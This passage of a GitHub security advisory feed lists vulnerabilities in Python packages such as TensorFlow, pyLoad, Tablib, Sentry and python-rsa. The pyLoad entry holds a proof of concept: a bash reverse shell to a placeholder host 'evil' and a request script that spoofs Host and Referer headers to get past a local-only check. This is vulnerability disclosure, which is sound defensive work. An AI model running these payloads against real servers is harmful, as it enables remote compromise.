<li><a href="https://www.exploit-db.com/exploits/45933">https://www.exploit-db.com/exploits/45933</a></li>
</ul>
]]></content>
        <author>
            <name>GitHub</name>
            <email>GitHub@noreply.github.com</email>
            <uri>https://github.com/advisories/GHSA-vxp9-wv2f-wqmw</uri>
        </author>
        <category label="severity" term="CRITICAL"/>
        <published>2018-11-09T17:40:56.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[[tensorflow-gpu] Improper Restriction of Operations within the Bounds of a Memory Buffer in Google TensorFlow]]></title>
        <id>https://github.com/advisories/GHSA-frxx-2m33-6wcr</id>
        <link href="https://github.com/advisories/GHSA-frxx-2m33-6wcr"/>
        <updated>2024-10-28T14:01:24.000Z</updated>
        <content type="html"><![CDATA[<p>Google TensorFlow 1.7 and below is affected by: Buffer Overflow. The impact is: execute arbitrary code (local). Users passing a malformed or malicious version of a TFLite graph into TOCO will cause TOCO to crash or cause a buffer overflow, potentially allowing malicious code to be executed.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2018-8825">https://nvd.nist.gov/vuln/detail/CVE-2018-8825</a></li>
<li><a href="https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2018-003.md">https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2018-003.md</a></li>
<li><a href="https://github.com/tensorflow/tensorflow/commit/41335abb46f80ca644b5738550daef6136ba5476">https://github.com/tensorflow/tensorflow/commit/41335abb46f80ca644b5738550daef6136ba5476</a></li>
<li><a href="https://github.com/tensorflow/tensorflow/commit/8badd11d875a826bd318ed439909d5c47a7fb811">https://github.com/tensorflow/tensorflow/commit/8badd11d875a826bd318ed439909d5c47a7fb811</a></li>
<li><a href="https://github.com/advisories/GHSA-frxx-2m33-6wcr">https://github.com/advisories/GHSA-frxx-2m33-6wcr</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2019-226.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2019-226.yaml</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2019-233.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2019-233.yaml</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2019-208.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2019-208.yaml</a></li>
</ul>
]]></content>
        <author>
            <name>GitHub</name>
            <email>GitHub@noreply.github.com</email>
            <uri>https://github.com/advisories/GHSA-frxx-2m33-6wcr</uri>
        </author>
        <category label="severity" term="HIGH"/>
        <published>2019-04-24T16:11:30.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[[sopel-plugins-channelmgnt] Privilege Escalation in Channelmgnt plug-in for Sopel]]></title>
        <id>https://github.com/advisories/GHSA-j257-jfvv-h3x5</id>
        <link href="https://github.com/advisories/GHSA-j257-jfvv-h3x5"/>
        <updated>2024-10-28T13:59:40.000Z</updated>
        <content type="html"><![CDATA[<h3 id="impact">Impact</h3>
<p>Malicious users are able to op/voice and take over a channel</p>
<h3 id="patches">Patches</h3>
<p>On version 1.0.3</p>
<h3 id="workarounds">Workarounds</h3>
<p>Disable channelmgnt</p>
<h3 id="references">References</h3>
<p><a href="https://phab.bots.miraheze.wiki/T117">https://phab.bots.miraheze.wiki/T117</a></p>
<h3 id="for-more-information">For more information</h3>
<p>If you have any questions or comments about this advisory:</p>
<ul>
<li>Email us at <a href="mailto:staff@mirahezebots.org">staff(at)mirahezebots(dot)org</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/MirahezeBots/sopel-channelmgnt/security/advisories/GHSA-j257-jfvv-h3x5">https://github.com/MirahezeBots/sopel-channelmgnt/security/advisories/GHSA-j257-jfvv-h3x5</a></li>
<li><a href="https://github.com/MirahezeBots/sopel-channelmgnt/pull/3">https://github.com/MirahezeBots/sopel-channelmgnt/pull/3</a></li>
<li><a href="https://phab.bots.miraheze.wiki/T117">https://phab.bots.miraheze.wiki/T117</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-15251">https://nvd.nist.gov/vuln/detail/CVE-2020-15251</a></li>
<li><a href="https://github.com/MirahezeBots/MirahezeBots/security/advisories/GHSA-23pc-4339-95vg">https://github.com/MirahezeBots/MirahezeBots/security/advisories/GHSA-23pc-4339-95vg</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/sopel-plugins-channelmgnt/PYSEC-2020-110.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/sopel-plugins-channelmgnt/PYSEC-2020-110.yaml</a></li>
<li><a href="https://phab.bots.miraheze.wiki/phame/live/1/post/1/summary">https://phab.bots.miraheze.wiki/phame/live/1/post/1/summary</a></li>
<li><a href="https://pypi.org/project/sopel-plugins.channelmgnt">https://pypi.org/project/sopel-plugins.channelmgnt</a></li>
<li><a href="https://github.com/advisories/GHSA-j257-jfvv-h3x5">https://github.com/advisories/GHSA-j257-jfvv-h3x5</a></li>
</ul>
]]></content>
        <author>
            <name>GitHub</name>
            <email>GitHub@noreply.github.com</email>
            <uri>https://github.com/advisories/GHSA-j257-jfvv-h3x5</uri>
        </author>
        <category label="severity" term="MODERATE"/>
        <published>2020-10-13T17:30:30.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[[pyload-ng] pyLoad vulnerable to remote code execution by download to /.pyload/scripts using /flashgot API]]></title>
        <id>https://github.com/advisories/GHSA-w7hq-f2pj-c53g</id>
        <link href="https://github.com/advisories/GHSA-w7hq-f2pj-c53g"/>
        <updated>2024-10-28T12:24:45.000Z</updated>
        <content type="html"><![CDATA[<h3 id="summary">Summary</h3>
<p>The folder <code>/.pyload/scripts</code> has scripts which are run when certain actions are completed, for e.g. a download is finished. By downloading a executable file to a folder in /scripts and performing the respective action, remote code execution can be achieved. A file can be downloaded to such a folder by changing the download folder to a folder in <code>/scripts</code> path and using the <code>/flashgot</code> API to download the file.</p>
<h3 id="details">Details</h3>
<p><strong>Configuration changes</strong></p>
<ol>
<li>Change the download folder to <code>/home/&lt;user&gt;/.pyload/scripts</code></li>
<li>Change permissions for downloaded files:<ol>
<li>Change permissions of downloads: on</li>
<li>Permission mode for downloaded files: 0744</li>
</ol>
</li>
</ol>
<p><strong>Making the request to download files</strong></p>
<p>The <code>flashgot</code> API provides functionality to download files from a provided URL. Although pyload tries to prevent non-local requests from being able to reach this API, it relies on checking the Host header and the Referer header of the incoming request. Both of these can be set by an attacker to arbitrary values, thereby bypassing these checks.</p>
<p><em>Referer header check</em></p>
<pre><code>def flashgot():
    if flask.request.referrer not in (
        "http://localhost:9666/flashgot",
        "http://127.0.0.1:9666/flashgot",
    ):
        flask.abort(500)
  ...
</code></pre>
<p><em>Host header check for local check</em></p>
<pre><code>def local_check(func):
    @wraps(func)
    def wrapper(*args, **kwargs):
        remote_addr = flask.request.environ.get("REMOTE_ADDR", "0")
        http_host = flask.request.environ.get("HTTP_HOST", "0")

        if remote_addr in ("127.0.0.1", "::ffff:127.0.0.1", "::1", "localhost") or http_host in (
            "127.0.0.1:9666",
            "[::1]:9666",
        ):
            return func(*args, **kwargs)
        else:
            return "Forbidden", 403

    return wrapper
</code></pre>
<p>Once the file is downloaded to a folder in the scripts folder, the attacker can perform the respective action, and the script will be executed</p>
<h3 id="poc">PoC</h3>
<p>Create a malicious file. I have created a reverse shell</p>
<pre><code>#!/bin/bash
bash -i &gt;&amp; /dev/tcp/evil/9002 0&gt;&amp;1
</code></pre>
<p>Host this file at some URL, for eg: <a href="http://evil">http://evil</a></p>
<p>Create a request like this for the <code>flashgot</code> API. I am using <code>download_finished</code> folder as the destination folder. Scripts in this folder are run when a download is completed.</p>
<pre><code>import requests

url = "http://pyload/flashgot"
headers = {"host": "127.0.0.1:9666", "Referer": "http://127.0.0.1:9666/flashgot"}

data = {
    "package": "download_finished",  
    "passwords": "optional_password",  
    "urls": "http://evil/exp.sh",
    "autostart": 1,
}


response = requests.post(url, data=data, headers=headers)
</code></pre>
<p>When the above request is made, exp.sh will be downloaded to <code>/scripts/download_finished folder</code>. For all subsequent downloads, this script will be run. Sending the request again causes a download of the file again, and when the download is complete, the script is run.</p>
<p>I also have a listener on my machine which receives the request from the pyload server. When the script executes, I get a connection back to my machine</p>
<h3 id="screenshots">Screenshots</h3>
<p><em>Download folder</em></p>
<img src="https://github.com/user-attachments/assets/77fc5202-bed2-41a2-98ae-9cb7b1315f76" alt="1" width="672">

<p><em><code>exp.sh</code> is downloaded</em></p>
<img src="https://github.com/user-attachments/assets/5e6e19db-2a5c-48f4-9973-817528b5b9ec" alt="2" width="714">

<p><em>Script is run</em></p>
<img src="https://github.com/user-attachments/assets/34fbdaee-50ba-46a8-a372-ec8c91d03aa9" alt="3" width="714">

<p><em>Reverse shell connection is received</em></p>
<img src="https://github.com/user-attachments/assets/4713d56e-e850-47ad-99b3-cab0c7bba800" alt="4" width="314">


<h3 id="impact">Impact</h3>
<p>This vulnerability allows an attacker with access to change the settings on a pyload server to execute arbitrary code and completely compromise the system</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g">https://github.com/pyload/pyload/security/advisories/GHSA-w7hq-f2pj-c53g</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47821">https://nvd.nist.gov/vuln/detail/CVE-2024-47821</a></li>
<li><a href="https://github.com/pyload/pyload/commit/48f59567393a19263c8a0285256a7537dc9ce109">https://github.com/pyload/pyload/commit/48f59567393a19263c8a0285256a7537dc9ce109</a></li>
<li><a href="https://github.com/advisories/GHSA-w7hq-f2pj-c53g">https://github.com/advisories/GHSA-w7hq-f2pj-c53g</a></li>
</ul>
]]></content>
        <author>
            <name>GitHub</name>
            <email>GitHub@noreply.github.com</email>
            <uri>https://github.com/advisories/GHSA-w7hq-f2pj-c53g</uri>
        </author>
        <category label="severity" term="HIGH"/>
        <published>2024-10-28T12:23:29.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[[tablib] Loaded Databook of Tablib prone to python insertion resulting in command execution]]></title>
        <id>https://github.com/advisories/GHSA-gcr6-rf47-jrgf</id>
        <link href="https://github.com/advisories/GHSA-gcr6-rf47-jrgf"/>
        <updated>2024-10-27T15:36:24.000Z</updated>
        <content type="html"><![CDATA[<p>An exploitable vulnerability exists in the Databook loading functionality of Tablib 0.11.4. A yaml loaded Databook can execute arbitrary python commands resulting in command execution. An attacker can insert python into loaded yaml to trigger this vulnerability.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2017-2810">https://nvd.nist.gov/vuln/detail/CVE-2017-2810</a></li>
<li><a href="https://security.gentoo.org/glsa/201811-18">https://security.gentoo.org/glsa/201811-18</a></li>
<li><a href="https://talosintelligence.com/vulnerability_reports/TALOS-2017-0307">https://talosintelligence.com/vulnerability_reports/TALOS-2017-0307</a></li>
<li><a href="https://github.com/jazzband/tablib/commit/69abfc3ada5d754cb152119c0b4777043657cb6e">https://github.com/jazzband/tablib/commit/69abfc3ada5d754cb152119c0b4777043657cb6e</a></li>
<li><a href="https://github.com/advisories/GHSA-gcr6-rf47-jrgf">https://github.com/advisories/GHSA-gcr6-rf47-jrgf</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/tablib/PYSEC-2017-95.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/tablib/PYSEC-2017-95.yaml</a></li>
</ul>
]]></content>
        <author>
            <name>GitHub</name>
            <email>GitHub@noreply.github.com</email>
            <uri>https://github.com/advisories/GHSA-gcr6-rf47-jrgf</uri>
        </author>
        <category label="severity" term="CRITICAL"/>
        <published>2018-07-13T16:01:25.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[[sosreport] SoSReport Predictable Tmp File Names]]></title>
        <id>https://github.com/advisories/GHSA-3g56-2hh3-35ph</id>
        <link href="https://github.com/advisories/GHSA-3g56-2hh3-35ph"/>
        <updated>2024-10-27T15:34:14.000Z</updated>
        <content type="html"><![CDATA[<p>sosreport in SoS 3.x allows local users to obtain sensitive information from sosreport files or gain privileges via a symlink attack on an archive file in a temporary directory, as demonstrated by <code>sosreport-$hostname-$date.tar</code> in <code>/tmp/sosreport-$hostname-$date</code>.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2015-7529">https://nvd.nist.gov/vuln/detail/CVE-2015-7529</a></li>
<li><a href="https://github.com/sosreport/sos/issues/696">https://github.com/sosreport/sos/issues/696</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2016:0152">https://access.redhat.com/errata/RHSA-2016:0152</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2016:0188">https://access.redhat.com/errata/RHSA-2016:0188</a></li>
<li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=1282542">https://bugzilla.redhat.com/show_bug.cgi?id=1282542</a></li>
<li><a href="http://rhn.redhat.com/errata/RHSA-2016-0152.html">http://rhn.redhat.com/errata/RHSA-2016-0152.html</a></li>
<li><a href="http://rhn.redhat.com/errata/RHSA-2016-0188.html">http://rhn.redhat.com/errata/RHSA-2016-0188.html</a></li>
<li><a href="http://www.ubuntu.com/usn/USN-2845-1">http://www.ubuntu.com/usn/USN-2845-1</a></li>
<li><a href="https://access.redhat.com/security/cve/CVE-2015-7529">https://access.redhat.com/security/cve/CVE-2015-7529</a></li>
<li><a href="https://web.archive.org/web/20160416033632/http://www.securityfocus.com/bid/83162">https://web.archive.org/web/20160416033632/http://www.securityfocus.com/bid/83162</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/sosreport/PYSEC-2017-73.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/sosreport/PYSEC-2017-73.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-3g56-2hh3-35ph">https://github.com/advisories/GHSA-3g56-2hh3-35ph</a></li>
</ul>
]]></content>
        <author>
            <name>GitHub</name>
            <email>GitHub@noreply.github.com</email>
            <uri>https://github.com/advisories/GHSA-3g56-2hh3-35ph</uri>
        </author>
        <category label="severity" term="HIGH"/>
        <published>2022-05-13T01:54:05.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[[sentry] Improper authorization on debug and artifact file downloads]]></title>
        <id>https://github.com/advisories/GHSA-m4hc-m2v6-hfw8</id>
        <link href="https://github.com/advisories/GHSA-m4hc-m2v6-hfw8"/>
        <updated>2024-10-26T22:53:44.000Z</updated>
        <content type="html"><![CDATA[<h3 id="impact">Impact</h3>
<p>An authenticated user can download a debug or artifact bundle from arbitrary organizations and projects with a known bundle ID. The user does not need to be a member of the organization or have permissions on the project.</p>
<h3 id="patches">Patches</h3>
<p>A patch was issued to ensure authorization checks are properly scoped on requests to retrieve debug or artifact bundles. Authenticated users who do not have the necessary permissions on the particular project are no longer able to download them.</p>
<p><strong>Sentry SaaS users do not need to take any action. <a href="https://github.com/getsentry/self-hosted">Self-Hosted Sentry</a> users should upgrade to version 23.5.2 or higher.</strong></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/getsentry/sentry/pull/49680">Restrict file downloads to Project</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/getsentry/sentry/security/advisories/GHSA-m4hc-m2v6-hfw8">https://github.com/getsentry/sentry/security/advisories/GHSA-m4hc-m2v6-hfw8</a></li>
<li><a href="https://github.com/getsentry/sentry/pull/49680">https://github.com/getsentry/sentry/pull/49680</a></li>
<li><a href="https://github.com/getsentry/sentry/commit/e932b15435bf36239431eaa3790a6bcfa47046a9">https://github.com/getsentry/sentry/commit/e932b15435bf36239431eaa3790a6bcfa47046a9</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-36826">https://nvd.nist.gov/vuln/detail/CVE-2023-36826</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/sentry/PYSEC-2023-130.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/sentry/PYSEC-2023-130.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-m4hc-m2v6-hfw8">https://github.com/advisories/GHSA-m4hc-m2v6-hfw8</a></li>
</ul>
]]></content>
        <author>
            <name>GitHub</name>
            <email>GitHub@noreply.github.com</email>
            <uri>https://github.com/advisories/GHSA-m4hc-m2v6-hfw8</uri>
        </author>
        <category label="severity" term="HIGH"/>
        <published>2023-07-25T17:19:48.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[[requests-kerberos] Improper Authentication in requests-kerberos]]></title>
        <id>https://github.com/advisories/GHSA-wh37-37xw-54hr</id>
        <link href="https://github.com/advisories/GHSA-wh37-37xw-54hr"/>
        <updated>2024-10-26T22:45:18.000Z</updated>
        <content type="html"><![CDATA[<p>python-requests-Kerberos through 0.5 does not handle mutual authentication</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2014-8650">https://nvd.nist.gov/vuln/detail/CVE-2014-8650</a></li>
<li><a href="https://github.com/requests/requests-kerberos/issues/35">https://github.com/requests/requests-kerberos/issues/35</a></li>
<li><a href="https://github.com/requests/requests-kerberos/pull/36">https://github.com/requests/requests-kerberos/pull/36</a></li>
<li><a href="https://github.com/mkomitee/requests-kerberos/commit/9c1e08cc17bb6950455a85d33d391ecd2bce6eb6">https://github.com/mkomitee/requests-kerberos/commit/9c1e08cc17bb6950455a85d33d391ecd2bce6eb6</a></li>
<li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-8650">https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-8650</a></li>
<li><a href="https://github.com/requests/requests-kerberos/blob/0.6/HISTORY.rst">https://github.com/requests/requests-kerberos/blob/0.6/HISTORY.rst</a></li>
<li><a href="https://security-tracker.debian.org/tracker/CVE-2014-8650">https://security-tracker.debian.org/tracker/CVE-2014-8650</a></li>
<li><a href="http://www.openwall.com/lists/oss-security/2014/11/07/1">http://www.openwall.com/lists/oss-security/2014/11/07/1</a></li>
<li><a href="https://github.com/advisories/GHSA-wh37-37xw-54hr">https://github.com/advisories/GHSA-wh37-37xw-54hr</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/requests-kerberos/PYSEC-2019-200.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/requests-kerberos/PYSEC-2019-200.yaml</a></li>
</ul>
]]></content>
        <author>
            <name>GitHub</name>
            <email>GitHub@noreply.github.com</email>
            <uri>https://github.com/advisories/GHSA-wh37-37xw-54hr</uri>
        </author>
        <category label="severity" term="CRITICAL"/>
        <published>2020-03-10T18:02:31.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[[salt] Minion identity not validated in saltstack]]></title>
        <id>https://github.com/advisories/GHSA-jmv9-5gx8-7xpf</id>
        <link href="https://github.com/advisories/GHSA-jmv9-5gx8-7xpf"/>
        <updated>2024-10-26T22:43:28.000Z</updated>
        <content type="html"><![CDATA[<p>Salt (aka SaltStack) before 0.15.0 through 0.17.0 allows remote authenticated minions to impersonate arbitrary minions via a crafted minion with a valid key.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2013-4439">https://nvd.nist.gov/vuln/detail/CVE-2013-4439</a></li>
<li><a href="https://github.com/saltstack/salt/pull/7356">https://github.com/saltstack/salt/pull/7356</a></li>
<li><a href="http://www.openwall.com/lists/oss-security/2013/10/18/3">http://www.openwall.com/lists/oss-security/2013/10/18/3</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/salt/PYSEC-2013-14.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/salt/PYSEC-2013-14.yaml</a></li>
<li><a href="https://github.com/advisories/GHSA-jmv9-5gx8-7xpf">https://github.com/advisories/GHSA-jmv9-5gx8-7xpf</a></li>
</ul>
]]></content>
        <author>
            <name>GitHub</name>
            <email>GitHub@noreply.github.com</email>
            <uri>https://github.com/advisories/GHSA-jmv9-5gx8-7xpf</uri>
        </author>
        <category label="severity" term="HIGH"/>
        <published>2022-05-17T04:58:30.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[[rsa] Timing attacks in python-rsa]]></title>
        <id>https://github.com/advisories/GHSA-xrx6-fmxq-rjj2</id>
        <link href="https://github.com/advisories/GHSA-xrx6-fmxq-rjj2"/>
        <updated>2024-10-26T22:33:22.000Z</updated>
        <content type="html"><![CDATA[<p>It was found that python-rsa is vulnerable to Bleichenbacher timing attacks. An attacker can use this flaw via the RSA decryption API to decrypt parts of the cipher text encrypted with RSA</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2020-25658">https://nvd.nist.gov/vuln/detail/CVE-2020-25658</a></li>
<li><a href="https://github.com/sybrenstuvel/python-rsa/issues/165">https://github.com/sybrenstuvel/python-rsa/issues/165</a></li>
<li><a href="https://github.com/sybrenstuvel/python-rsa/commit/dae8ce0d85478e16f2368b2341632775313d41ed">https://github.com/sybrenstuvel/python-rsa/commit/dae8ce0d85478e16f2368b2341632775313d41ed</a></li>
<li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-25658">https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-25658</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2020:5634">https://access.redhat.com/errata/RHSA-2020:5634</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2021:0637">https://access.redhat.com/errata/RHSA-2021:0637</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2022:1716">https://access.redhat.com/errata/RHSA-2022:1716</a></li>
<li><a href="https://access.redhat.com/security/cve/CVE-2020-25658">https://access.redhat.com/security/cve/CVE-2020-25658</a></li>
<li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=1889972">https://bugzilla.redhat.com/show_bug.cgi?id=1889972</a></li>
<li><a href="https://github.com/advisories/GHSA-xrx6-fmxq-rjj2">https://github.com/advisories/GHSA-xrx6-fmxq-rjj2</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/rsa/PYSEC-2020-100.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/rsa/PYSEC-2020-100.yaml</a></li>
<li><a href="https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SAF67KDGSOHLVFTRDOHNEAFDRSSYIWA">https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2SAF67KDGSOHLVFTRDOHNEAFDRSSYIWA</a></li>
<li><a href="https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/APF364QJ2IYLPDNVFBOEJ24QP2WLVLJP">https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/APF364QJ2IYLPDNVFBOEJ24QP2WLVLJP</a></li>
<li><a href="https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QY4PJWTYSOV7ZEYZVMYIF6XRU73CY6O7">https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QY4PJWTYSOV7ZEYZVMYIF6XRU73CY6O7</a></li>
<li><a href="https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2SAF67KDGSOHLVFTRDOHNEAFDRSSYIWA">https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2SAF67KDGSOHLVFTRDOHNEAFDRSSYIWA</a></li>
<li><a href="https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/APF364QJ2IYLPDNVFBOEJ24QP2WLVLJP">https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/APF364QJ2IYLPDNVFBOEJ24QP2WLVLJP</a></li>
<li><a href="https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QY4PJWTYSOV7ZEYZVMYIF6XRU73CY6O7">https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QY4PJWTYSOV7ZEYZVMYIF6XRU73CY6O7</a></li>
</ul>
]]></content>
        <author>
            <name>GitHub</name>
            <email>GitHub@noreply.github.com</email>
            <uri>https://github.com/advisories/GHSA-xrx6-fmxq-rjj2</uri>
        </author>
        <category label="severity" term="HIGH"/>
        <published>2021-04-30T17:35:15.000Z</published>
    </entry>
</feed>